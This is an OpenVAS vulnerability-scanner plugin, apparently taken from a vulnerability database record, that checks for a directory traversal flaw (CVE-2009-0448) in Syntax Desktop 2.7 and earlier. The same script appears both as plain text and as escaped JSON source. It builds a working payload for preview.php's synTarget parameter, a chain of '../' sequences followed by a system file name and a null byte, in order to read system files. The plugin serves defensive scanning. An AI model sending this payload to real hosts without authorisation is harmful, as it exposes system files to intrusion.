ID OPENVAS:1361412562310800234 Type openvas Reporter Copyright (C) 2009 Greenbone Networks GmbH Modified 2020-05-06T00:00:00
Description
This host is running Syntax Desktop and is prone to Directory
Traversal Vulnerability.
##############################################################################
# OpenVAS Vulnerability Test
#
# Syntax Desktop Directory Traversal Vulnerability
#
# Authors:
# Sujit Ghosal <sghosal@secpod.com>
#
# Copyright:
# Copyright (C) 2009 Greenbone Networks GmbH, http://www.greenbone.net
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.800234");
script_version("2020-05-06T07:10:15+0000");
script_tag(name:"last_modification", value:"2020-05-06 07:10:15 +0000 (Wed, 06 May 2020)");
script_tag(name:"creation_date", value:"2009-02-20 17:40:17 +0100 (Fri, 20 Feb 2009)");
script_tag(name:"cvss_base", value:"7.5");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_bugtraq_id(33601);
script_cve_id("CVE-2009-0448");
script_name("Syntax Desktop Directory Traversal Vulnerability");
script_xref(name:"URL", value:"http://www.milw0rm.com/exploits/7977");
script_category(ACT_ATTACK);
script_copyright("Copyright (C) 2009 Greenbone Networks GmbH");
script_family("Web application abuses");
script_dependencies("find_service.nasl", "no404.nasl", "webmirror.nasl", "DDI_Directory_Scanner.nasl", "os_detection.nasl", "global_settings.nasl");
script_require_ports("Services/www", 80);
script_exclude_keys("Settings/disable_cgi_scanning");
script_tag(name:"affected", value:"Syntax Desktop 2.7 and prior");
script_tag(name:"insight", value:"This flaw is due to error in file 'preview.php' in 'synTarget'
parameter which lets the attacker to gain information through directory
traversal queries.");
script_tag(name:"solution", value:"No known solution was made available for at least one year since the disclosure of this vulnerability.
Likely none will be provided anymore. General solution options are to upgrade to a newer release, disable respective features, remove the
product or replace the product by another one.");
script_tag(name:"summary", value:"This host is running Syntax Desktop and is prone to Directory
Traversal Vulnerability.");
script_tag(name:"impact", value:"Successful exploitation will let the attacker gain sensitive information
about the remote system directories where syntax desktop runs.");
script_tag(name:"solution_type", value:"WillNotFix");
script_tag(name:"qod_type", value:"remote_app");
exit(0);
}
include("host_details.inc");
include("misc_func.inc");
include("http_func.inc");
include("http_keepalive.inc");
synPort = http_get_port(default:80);
if(!http_can_host_php(port:synPort)){
exit(0);
}
files = traversal_files();
foreach path(make_list_unique("/", http_cgi_dirs(port:synPort))) {
if(path == "/") path = "";
response = http_get_cache(item: path + "/index.php", port:synPort);
if("Syntax Desktop" >< response) {
foreach file ( keys( files ) ) {
url = path + "/admin/modules/aa/preview.php?synTarget=../../../../../../../../../" + files[file] + "%00";
if( http_vuln_check( port:synPort, url:url, pattern:file ) ) {
report = http_report_vuln_url(port:synPort, url:url);
security_message(port:synPort, data:report);
exit(0);
}
}
}
}
exit(99);
{"id": "OPENVAS:1361412562310800234", "type": "openvas", "bulletinFamily": "scanner", "title": "Syntax Desktop Directory Traversal Vulnerability", "description": "This host is running Syntax Desktop and is prone to Directory\n Traversal Vulnerability.", "published": "2009-02-20T00:00:00", "modified": "2020-05-06T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310800234", "reporter": "Copyright (C) 2009 Greenbone Networks GmbH", "references": ["http://www.milw0rm.com/exploits/7977"], "cvelist": ["CVE-2009-0448"], "lastseen": "2020-05-08T19:12:07", "viewCount": 1, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-0448"]}, {"type": "exploitdb", "idList": ["EDB-ID:7977"]}], "modified": "2020-05-08T19:12:07", "rev": 2}, "score": {"value": 6.3, "vector": "NONE", "modified": "2020-05-08T19:12:07", "rev": 2}, "vulnersScore": 6.3}, "pluginID": "1361412562310800234", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n#\n# Syntax Desktop Directory Traversal Vulnerability\n#\n# Authors:\n# Sujit Ghosal <sghosal@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.800234\");\n script_version(\"2020-05-06T07:10:15+0000\");\n script_tag(name:\"last_modification\", value:\"2020-05-06 07:10:15 +0000 (Wed, 06 May 2020)\");\n script_tag(name:\"creation_date\", value:\"2009-02-20 17:40:17 +0100 (Fri, 20 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_bugtraq_id(33601);\n script_cve_id(\"CVE-2009-0448\");\n script_name(\"Syntax Desktop Directory Traversal Vulnerability\");\n script_xref(name:\"URL\", value:\"http://www.milw0rm.com/exploits/7977\");\n\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"find_service.nasl\", \"no404.nasl\", \"webmirror.nasl\", \"DDI_Directory_Scanner.nasl\", \"os_detection.nasl\", \"global_settings.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n\n script_tag(name:\"affected\", value:\"Syntax Desktop 2.7 and prior\");\n\n script_tag(name:\"insight\", value:\"This flaw is due to error in file 'preview.php' in 'synTarget'\n parameter which lets the attacker to gain information through directory\n traversal queries.\");\n\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since the disclosure of this vulnerability.\n Likely none will be provided anymore. General solution options are to upgrade to a newer release, disable respective features, remove the\n product or replace the product by another one.\");\n\n script_tag(name:\"summary\", value:\"This host is running Syntax Desktop and is prone to Directory\n Traversal Vulnerability.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will let the attacker gain sensitive information\n about the remote system directories where syntax desktop runs.\");\n\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n script_tag(name:\"qod_type\", value:\"remote_app\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nsynPort = http_get_port(default:80);\n\nif(!http_can_host_php(port:synPort)){\n exit(0);\n}\n\nfiles = traversal_files();\n\nforeach path(make_list_unique(\"/\", http_cgi_dirs(port:synPort))) {\n\n if(path == \"/\") path = \"\";\n\n response = http_get_cache(item: path + \"/index.php\", port:synPort);\n\n if(\"Syntax Desktop\" >< response) {\n\n foreach file ( keys( files ) ) {\n\n url = path + \"/admin/modules/aa/preview.php?synTarget=../../../../../../../../../\" + files[file] + \"%00\";\n if( http_vuln_check( port:synPort, url:url, pattern:file ) ) {\n report = http_report_vuln_url(port:synPort, url:url);\n security_message(port:synPort, data:report);\n exit(0);\n }\n }\n }\n}\n\nexit(99);\n", "naslFamily": "Web application abuses", "immutableFields": []}